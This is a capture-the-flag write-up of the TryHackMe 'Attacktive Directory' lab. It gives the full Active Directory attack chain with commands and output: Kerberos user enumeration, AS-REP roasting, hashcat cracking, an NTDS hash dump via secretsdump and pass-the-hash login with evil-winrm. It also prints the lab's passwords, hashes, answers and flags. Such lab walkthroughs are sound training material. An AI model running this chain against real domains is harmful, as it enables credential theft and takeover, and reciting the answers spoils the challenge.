Hi everyone! Today's post is on a TryHackMe challenge on Attacktive Directory that will introduce to u Kerberos user enumeration using Kerbrute on Domain Controller (DC), AS-REP Roasting using GetNPUsers on DC, Hashcat to crack Kerberos hashes, dumping password hashes from DC, and using Evil-WinRM to access the DC. Let's get started!

1. Deploy the machine

You can use Kali Linux, Parrot OS, or TryHackMe (THM)'s attack machine to attack the Domain Controller (DC).

2. Setup

Impacket installation

Impacket has always been very difficult to install correctly. Any missing steps often result in a brunch of errors when running tools from Impacket. Thus, TryHackMe (THM) provided us steps to install correctly. If you are using THM's attack machine, Impacket and Bloodhound have already been installed.

Firstly, we have to clone Impacket from the GitHub repository.

kali@kali~$ sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

Next, we shall install the requirements.

kali@kali~$ sudo pip3 install -r /opt/impacket/requirements.txt

Finally, we can run the Python installation script.

kali@kali~$ cd /opt/impacket/ && sudo python3 ./setup.py install

2. Welcome to Active Directory

We first have to use nmap to check out the services available on the Domain Controller (DC). In this simple lab setup, there is only the DC available. Of course with different Active Directory (AD) environments, we may have to enumerate and attack other workstations before we have a shot to access the DC.

kali@kali~$ sudo nmap -sC -sV -n -p- 10.10.6.165  [sudo] password for kali:   Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-11 22:05 EST  Nmap scan report for 10.10.139.4  Host is up (0.36s latency).  Not shown: 987 closed ports  PORT     STATE SERVICE       VERSION  53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-12 07:17:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| DNS_Tree_Name: spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-01-12T07:18:14+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-01-11T06:34:36
|_Not valid after: 2022-07-13T06:34:36
|_ssl-date: 2022-01-12T07:18:26+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

We can also use enum4linux on port 139/445 to enumerate the NetBIOS for information such as the existing usernames, NetBIOS-Domain Name, SID, etc.

kali@kali~$ enum4linux 10.10.6.165  Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jan 11 22:10:14 2022     ==========================   |    Target Information    |   ==========================   Target ........... 10.10.6.165  RID Range ........ 500-550,1000-1050  Username ......... ''  Password ......... ''  Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none       ===================================================   |    Enumerating Workgroup/Domain on 10.10.6.165   |   ===================================================   [E] Can't find workgroup/domain       ===========================================   |    Nbtstat Information for 10.10.6.165    |   ===========================================   Looking up status of 10.10.6.165  No reply from 10.10.6.165     ====================================   |    Session Check on 10.10.6.165    |   ====================================   Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.  [+] Server 10.10.139.4 allows sessions using username '', password ''  Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.  [+] Got domain/workgroup name:      ==========================================   |    Getting domain SID for 10.10.6.165    |   ==========================================   Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.  Domain Name: THM-AD  Domain Sid: S-1-5-21-3591857110-2884097990-301047963  [+] Host is part of a domain (not a workgroup)    ...  

Questions and answers

What tool will allow us to enumerate port 139/445?

enum4linux

What is the NetBIOS-Domain Name of the machine?

THM-AD

What invalid TLD do people commonly use for their Active Directory Domain?

.local

4. Enumerating Users via Kerberos

Based on TryHackMe (THM), we are recommended to use Kerbrute for this challenge to brute force Kerberos (key authentication service in Active Directory) to enumerate usernames and passwords. A modified username list and password list have been given to us. Note that it is actually not recommended to brute force credentials due to account lockout policies.

Firstly, I downloaded Kerbrute into my Kali and change its execution permission.

kali@kali~$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64  kali@kali~$ chmod +x kerbrute_linux_amd64

Next, I downloaded both the user list and password list.

kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt  kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

We can now check out the usage of the tool and use it on the Domain Controller (DC).

kali@kali~$ ./kerbrute_linux_amd64 --help  ...  Usage:    kerbrute [command]    Available Commands:    bruteforce    Bruteforce username:password combos, from a file or stdin    bruteuser     Bruteforce a single user's password from a wordlist    help          Help about any command    passwordspray Test a single password against a list of users    userenum      Enumerate valid domain usernames via Kerberos    version       Display version info and quit    Flags:        --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS        --delay int       Delay in millisecond between each attempt. Will always use single thread if set    -d, --domain string   The full domain to use (e.g. contoso.com)    -h, --help            help for kerbrute    -o, --output string   File to write logs to. Optional.        --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE    -t, --threads int     Threads to use (default 10)    -v, --verbose         Log failures and errors    kali@kali~$ ./kerbrute_linux_amd64 userenum --dc=10.10.6.165 -d=spookysec.local.  userlist.txt  ...  Version: v1.0.3 (9dad6e1) - 01/11/22 - Ronnie Flathers @ropnop    2022/01/11 22:53:06 >  Using KDC(s):  2022/01/11 22:53:06 >   10.10.6.165:88    2022/01/11 22:53:07 >  [+] VALID USERNAME:       james@spookysec.local.  2022/01/11 22:53:13 >  [+] VALID USERNAME:       svc-admin@spookysec.local.  2022/01/11 22:53:21 >  [+] VALID USERNAME:       James@spookysec.local.  2022/01/11 22:53:24 >  [+] VALID USERNAME:       robin@spookysec.local.  2022/01/11 22:53:54 >  [+] VALID USERNAME:       darkstar@spookysec.local.  2022/01/11 22:54:13 >  [+] VALID USERNAME:       administrator@spookysec.local.  2022/01/11 22:54:50 >  [+] VALID USERNAME:       backup@spookysec.local.  2022/01/11 22:55:08 >  [+] VALID USERNAME:       paradox@spookysec.local.

Questions and answers

What command within Kerbrute will allow us to enumerate valid usernames?

userenum

What notable account is discovered? (These should jump out at you)

svc-admin

What is the other notable account is discovered? (These should jump out at you)

backup

5. Abusing Kerberos

In this challenge, we can ASREPRoasting as a user account or more do not require pre-authentication details before requesting a Kerberos Ticket. Thus, we can use Impacket's /opt/impacket/examples/GetNPUsers.py to query ASReproastable accounts from the Key Distribution Center. However, we will need to provide a list of usernames. Since previously we already brute force the list of usernames, we can use those usernames.

In my validusers.txt:

james  svc-admin  James  robin  darkstar  administrator  backup  paradox

Obtaining ASReproastable accounts.

kali@kali~$ python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip 10.10.6.165 spookysec.local/  Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation    [-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set  $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566  [-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set  [-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set  [-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set  [-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set  [-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set  [-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set

We can see that only svc-admin can request a ticket without a need to provide its password.

A quick google will allow us to find out we should use mode 18200 to crack the hash.

kali@kali~$ hashcat -h | grep 18200    18200 | Kerberos 5, etype 23, AS-REP                     | Network Protocols

Finally, we can attempt to crack the password of svc-admin using hashcat. I first store the hash in hash.txt before cracking it with the password list provided previously.

kali@kali~$ cat hash.txt  $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566    kali@kali~$ hashcat -m18200 hash.txt passwordlist.txt  ...  $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566:management2005

It should only take a few seconds to crack the hash on a virtual machine Kali. If you do it on your Windows host, it will be even faster. We should obtain the password "management2005".

Questions and answers

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

svc-admin

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

Kerberos 5, etype 23, AS-REP

What mode is the hash?

18200

Now crack the hash with the modified password list provided, what is the user accounts password?

management2005

6. Back to the Basics

We can now attempt to enumerate SMB shared folders using our newly found credentials.

kali@kali~$ smbclient -L 10.10.6.165 -U "svc-admin"  Enter WORKGROUP\svc-admin's password: management2005            Sharename       Type      Comment          ---------       ----      -------          ADMIN$          Disk      Remote Admin          backup          Disk                C$              Disk      Default share          IPC$            IPC       Remote IPC          NETLOGON        Disk      Logon server share           SYSVOL          Disk      Logon server share

Going through each shared folder, I found an interesting folder to which I can login and see an interesting text file.

kali@kali~$ smbclient \\\\10.10.6.165\\backup -U "svc-admin"  Enter WORKGROUP\svc-admin's password: management2005  Try "help" to get a list of possible commands.  smb: \> dir    .                                   D        0  Sat Apr  4 15:08:39 2020    ..                                  D        0  Sat Apr  4 15:08:39 2020    backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

I downloaded the text file and looked at its content.

smb: \> get backup_credentials.txt  getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)  smb: \> exit    kali@kali~$ cat backup_credentials.txt  YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

It looks like it is base64 encoded. Thus, decoding it allows us to see a valid credential.

kali@kali~$ base64 -d backup_credentials.txt  backup@spookysec.local:backup2517860

Questions and answers

What utility can we use to map remote SMB shares?

smbclient

Which option will list shares?

-L

How many remote shares is the server listing?

6

There is one particular share that we have access to that contains a text file. Which share is it?

backup

What is the content of the file?

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding the contents of the file, what is the full contents?

backup@spookysec.local:backup2517860

7. Elevating Privileges within the Domain

Obtaining the credentials of backup allows us to have more privileges as the backup account in a Domain Controller (DC) This is because any changes to the Active Directory (AD) will reflect those changes in this backup account. As a result, we can obtain every user's password hashes. To do so, we can use Impacket's secretsdump.py.

kali@kali~$ python3 /opt/impacket/examples/secretsdump.py  spookysec.local/backup:backup2517860@10.10.6.165  Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation    [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied   [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)  [*] Using the DRSUAPI method to get NTDS.DIT secrets  Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::  spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::  spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::  spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::  spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::  spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::  spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::  spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::  spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::  spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::  spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::  spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::  spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::  spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::  spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::  ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:bf23f4f1cf41c6f75b54f6acb6c90226:::

Finally, we will need to install evil-winrm to access the system since port 5985 for WinRM is open.

kali@kali~$ sudo gem install evil-winrm

Questions and answers

What method allowed us to dump NTDS.DIT?

DRSUAPI

What is the Administrators NTLM hash?

0e0363213e37b94221497260b0bcb4fc

What method of attack could allow us to authenticate as the user without the password?

pass the hash

Using a tool called Evil-WinRM what option will allow us to use a hash?

-H

8. Flag submission panel

Submit the flags for each user account. They can be located on each user's desktop. We can just login into the administrator's account which have access to other users' desktops.

kali@kali~$ evil-winrm -i 10.10.6.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc  ...  *Evil-WinRM* PS C:\Users\Administrator\Documents> 

We can now access each users's desktop to obtain their hash.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\svc-admin\Desktop  *Evil-WinRM* PS C:\Users\svc-admin\Desktop> dir          Directory: C:\Users\svc-admin\Desktop      Mode                LastWriteTime         Length Name  ----                -------------         ------ ----  -a----         4/4/2020  12:18 PM             28 user.txt.txt      *Evil-WinRM* PS C:\Users\svc-admin\Desktop> type user.txt.txt  TryHackMe{K3rb3r0s_Pr3_4uth}  *Evil-WinRM* PS C:\Users\svc-admin\Desktop> cd C:\Users\backup\Desktop  *Evil-WinRM* PS C:\Users\backup\Desktop> dir          Directory: C:\Users\backup\Desktop      Mode                LastWriteTime         Length Name  ----                -------------         ------ ----  -a----         4/4/2020  12:19 PM             26 PrivEsc.txt      *Evil-WinRM* PS C:\Users\backup\Desktop> type PrivEsc.txt  TryHackMe{B4ckM3UpSc0tty!}  *Evil-WinRM* PS C:\Users\backup\Desktop> cd C:\Users\Administrator\Desktop  *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir          Directory: C:\Users\Administrator\Desktop      Mode                LastWriteTime         Length Name  ----                -------------         ------ ----  -a----         4/4/2020  11:39 AM             32 root.txt      *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt  TryHackMe{4ctiveD1rectoryM4st3r}

Questions and answers

svc-admin

TryHackMe{K3rb3r0s_Pr3_4uth}

backup

TryHackMe{B4ckM3UpSc0tty!}

Administrator

TryHackMe{4ctiveD1rectoryM4st3r}

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂


This post is ad-supported